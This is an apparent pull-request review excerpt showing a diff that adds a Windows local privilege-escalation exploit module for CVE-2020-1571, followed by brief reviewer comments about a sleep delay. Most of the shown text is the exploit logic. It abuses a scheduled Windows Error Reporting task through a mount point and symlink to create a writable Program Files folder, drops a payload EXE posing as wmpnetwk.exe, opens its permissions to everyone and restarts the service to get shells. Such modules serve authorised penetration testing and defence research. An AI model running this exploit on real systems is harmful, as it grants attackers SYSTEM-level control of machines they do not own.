modules/exploits/windows/local/cve_2020_1571_windows_setup_lpe.rb

```diff
@@ -0,0 +1,197 @@
+    sleep(3)
+    cmd_exec('schtasks /end /TN "\\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting"')
+
+    unless directory?('C:\\ProgramData\\Microsoft\\Windows\\WER')
+      print_error("Something went wrong, the WER directory wasn't recreated!")
+    end
+    move_folders_out_of_wer
+
+    print_status('Creating mount point between the WER directory and \\RPC Control...')
+    mount_point_handle = create_mount_point('\\??\\C:\\ProgramData\\Microsoft\\Windows\\WER', '\\RPC Control')
+    if mount_point_handle.nil?
+      fail_with(Failure::Unknown, 'Error when creating the directory junction... aborting.')
+    end
+    print_good('Created the directory junction successfully!')
+
+    symlink_info = create_symlink(nil, '\\RPC Control\\Temp', '\\??\\c:\\Program Files\\Windows Media Player')
+    unless symlink_info
+      fail_with(Failure::Unknown, 'Error when creating the wermgr.exe.local symlink... aborting.')
+    end
+    print_good('Created the symbolic link between \\RPC Control\\Temp and \\??\\c:\\Program Files\\Windows Media Player successfully!')
+    symlink_handle_value = symlink_info['LinkHandle']
+
+    print_status('Running the QueueReporting task again to create the folder C:\\Program Files\\Windows Media Player with open permissions...')
+    cmd_exec('schtasks /run /TN "\\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting"')
+    sleep(5)
+    exe = generate_payload_exe({ code: payload.encoded })
+    write_file('C:\\Program Files\\Windows Media Player\\wmpnetwk.exe', exe)
+    register_file_for_cleanup('C:\\Program Files\\Windows Media Player\\wmpnetwk.exe')
+    print_good('Created the malicious EXE at C:\\Program Files\\Windows Media Player\\wmpnetwk.exe')
+
+    print_status('Setting the permissions on the malicious EXE at C:\\Program Files\\Windows Media Player\\wmpnetwk.exe so that everyone can access it...')
+    cmd_exec('icacls "C:\\Program Files\\Windows Media Player\\wmpnetwk.exe" /grant *S-1-1-0:(F)')
+
+    vprint_status('Closing symbolic link handle...')
+    session.railgun.kernel32.CloseHandle(symlink_handle_value)
+    vprint_good('Closed symlink handle!')
+
+    vprint_status('Cleaning up by removing the WER junction directory...')
+    session.railgun.kernel32.CloseHandle(mount_point_handle)
+    session.fs.dir.rmdir('C:\\ProgramData\\Microsoft\\Windows\\WER')
+    vprint_good('Removed the WER junction directory!')
+    cmd_exec('net stop WMPNetworkSvc')
+    begin
+      cmd_exec('net start WMPNetworkSvc')
+    rescue Rex::TimeoutError
+      # We expect this to happen, so lets keep going
+    end
+    print_good('Should be good to go, enjoy the shells!')
+    sleep(10) # Sleep a bit to allow the service to run and for the automigrate to complete and the files to be deleted.
+    # Without this sleep statement here, the payload that we drop will not be erased from the target system automatically.
```

Comment:
This seems incredibly odd. Any idea why that is? Also have you tried setting the `WfsDelay`.

Reply:
Nope, no idea, I just tried it and it worked. I think this occurs due to some conflict between when the service runs and when we try and clean stuff up. So by allowing a bit of time for the service to run first we avoid the issue of trying to clean up whilst files are in use.

Reply:
If it's an issue with cleaning up files that are in use can you try setting `FileDropperDelay` instead?

Reply:
Sure let me check if that helps or not @smcintyre-r7, sounds like that would be a better solution than this